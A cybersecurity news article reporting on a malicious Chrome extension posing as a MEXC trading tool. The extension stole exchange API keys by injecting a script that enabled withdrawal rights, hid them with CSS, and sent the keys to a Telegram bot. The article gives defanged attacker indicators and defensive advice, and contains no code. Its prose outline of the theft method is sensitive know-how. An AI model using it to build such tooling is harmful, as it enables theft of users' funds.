SQ Magazine

Smarter Insights for a Fast-Moving Digital World

Subscribe To Our Newsletter

Fake MEXC Trading Extension on Chrome Store Exposes Millions to Crypto Theft

Updated on:
Sofia Ramirez
Written By
Sofia Ramirez
Sofia Ramirez
Senior Tech Writer
Sofia Ramirez
Sofia Ramirez is a technology and cybersecurity writer at SQ Magazine. With a keen eye on emerging threats and innovations, she helps reader...
LATEST POSTS:

17.5 Million Instagram Accounts Compromised in Major Dark Web Leak

How AI Is Transforming Online Casinos: From Fraud Detection to Player Experience

CertiK and YZi Labs Launch $1 Million Security Grant for Web3 and AI Startups

As Featured In
BluehostActive CampaignDesignrushSeeking AlphaResearch Com

A malicious Chrome extension posing as a trading tool for the MEXC exchange has compromised user accounts and stolen cryptocurrency.

Quick Summary – TLDR:

  • A Chrome extension named MEXC API Automator secretly enabled withdrawals and stole user API credentials.
  • The extension exfiltrated sensitive data to a Telegram bot controlled by the attacker.
  • It manipulated the MEXC interface to hide dangerous permissions, misleading users.
  • Despite being flagged, the extension is still available on the Chrome Web Store at the time of writing.

What Happened?

A malicious Chrome extension called MEXC API Automator has been discovered stealing credentials from users of the cryptocurrency exchange MEXC. Published on the Chrome Web Store on September 1, 2025, it claimed to automate trading tasks but instead gave attackers full control over victim accounts. The extension was flagged by cybersecurity firm Socket, which exposed its deceptive techniques and urged immediate user action.

A Closer Look at the Threat

The extension was marketed as a productivity tool to simplify the process of creating MEXC API keys for traders. In reality, it was a credential-stealing malware that allowed attackers to:

  • Create new API keys with full permissions including trading and withdrawals.
  • Hide enabled withdrawal permissions from the user interface through clever CSS manipulation.
  • Intercept and send API credentials to a hardcoded Telegram bot controlled by the attacker.

Once users visited the MEXC API management page, the extension injected a malicious script into the session. This script automatically ticked all permission checkboxes, including withdrawal rights, even though the UI made it look like withdrawals were disabled.

After the user completed two-factor authentication (2FA), the script grabbed the newly generated API key and secret and sent them to a Telegram bot using a fixed bot token and chat ID. These credentials gave the attacker programmatic access to the victim’s MEXC account, letting them execute trades and withdraw funds without needing passwords or additional verification.

How It Works?

  • Operates only within the browser during an authenticated MEXC session.
  • Does not bypass 2FA but waits until the user completes it to steal the API key.
  • Sends credentials via HTTPS POST to a Telegram bot for remote control.
  • Maintains deception by hiding withdrawal permission status in the UI with injected styles.
  • Uses Russian language comments in its code, indicating the likely origin of the threat actor.

The attacker used the alias jorjortan142 and promoted the extension under the brand SwapSushi. This handle appears on multiple platforms:

  • An X (Twitter) account with the handle @jorjortan142 branding themselves as “sushi.crypto”
  • A Telegram bot at t[.]me/swapsushibot
  • A YouTube channel promoting SwapSushi tools
  • A suspicious domain swapsushi[.]net flagged by anti-scam communities
Newsletter
Subscribe To Our Newsletter!

Be the first to get exclusive offers and the latest news.

MEXC: A High-Value Target

MEXC is one of the world’s largest centralized crypto exchanges, serving users in over 170 countries. Its support for API-based trading and withdrawals makes it a prime target for attackers seeking direct access to user funds.

Although MEXC officially blocks users in countries like the United States, Canada, and the United Kingdom, many users in those regions bypass restrictions using VPNs. This significantly expands the potential victim pool and complicates incident response.

The stolen API keys:

  • Are long-lived and often not rotated regularly.
  • Are commonly used across bots and trading systems.
  • Are less likely to trigger alerts compared to logins.

This allows attackers to quietly drain funds over time or rapidly execute trades and withdrawals before users notice anything wrong.

Security Recommendations

Socket’s researchers warn that this kind of attack may be replicated across other exchanges and financial tools. They recommend:

  • Auditing all browser extensions on devices accessing financial accounts.
  • Removing suspicious extensions, especially those offering automated trading or API features.
  • Treating API keys as high-value secrets by storing them securely and rotating them frequently.
  • Monitoring for anomalous behavior like API key creation or trades from unfamiliar locations.
  • Using browser extension allowlists and centralized controls in enterprise environments.

Socket’s AI-based scanning tools have flagged the MEXC API Automator as confirmed malware. They are continuing to alert users and have reported the issue to Google.

SQ Magazine Takeaway

I find it shocking that a malicious extension like this could stay live on the Chrome Web Store for months, even after being flagged. Crypto users often trust browser tools to make their lives easier, but this is a reminder that convenience can come at a steep price. If you’re using any kind of extension that touches your exchange account, now is the time to double-check and clean house. Even if you’re security-savvy, UI tricks like hiding withdrawal permissions can fool anyone.

Add SQ Magazine as a Preferred Source on Google for updates! Follow on Google News
Sofia Ramirez

Sofia Ramirez

Senior Tech Writer

Sofia Ramirez is a technology and cybersecurity writer at SQ Magazine. With a keen eye on emerging threats and innovations, she helps readers stay informed and secure in today’s fast-changing tech landscape. Passionate about making cybersecurity accessible, Sofia blends research-driven analysis with straightforward explanations; so whether you’re a tech professional or a curious reader, her work ensures you’re always one step ahead in the digital world.

Disclaimer: The content published on SQ Magazine is for informational and educational purposes only. Please verify details independently before making any important decisions based on our content.

Related Posts

H100 to Acquire Future Holdings, Strengthens Institutional Bitcoin Push
Cryptocurrency

H100 to Acquire Future Holdings, Strengthens Institutional Bitcoin Push
Apple and Google Team Up to Boost Siri With Gemini AI
Artificial Intelligence

Apple and Google Team Up to Boost Siri With Gemini AI
New Dubai Crypto Rules Ban Privacy Tokens and Redefine Stablecoin Eligibility
Cryptocurrency

New Dubai Crypto Rules Ban Privacy Tokens and Redefine Stablecoin Eligibility

Reader Interactions

Leave a Comment

Company
Discover
Categories
  • Internet
  • Gaming
  • Technology
  • Artificial Intelligence
  • Cybersecurity
Internet
Gaming
Technology
Artificial Intelligence
Cybersecurity
Categories
  • Internet
  • Gaming
  • Technology
  • Artificial Intelligence
  • Cybersecurity
Internet
Gaming
Technology
Artificial Intelligence
Cybersecurity
Newsletter

Subscribe To Our Newsletter!

Be the first to get exclusive offers and the latest news.

Newsletter

Subscribe To Our Newsletter!

Be the first to get exclusive offers and the latest news.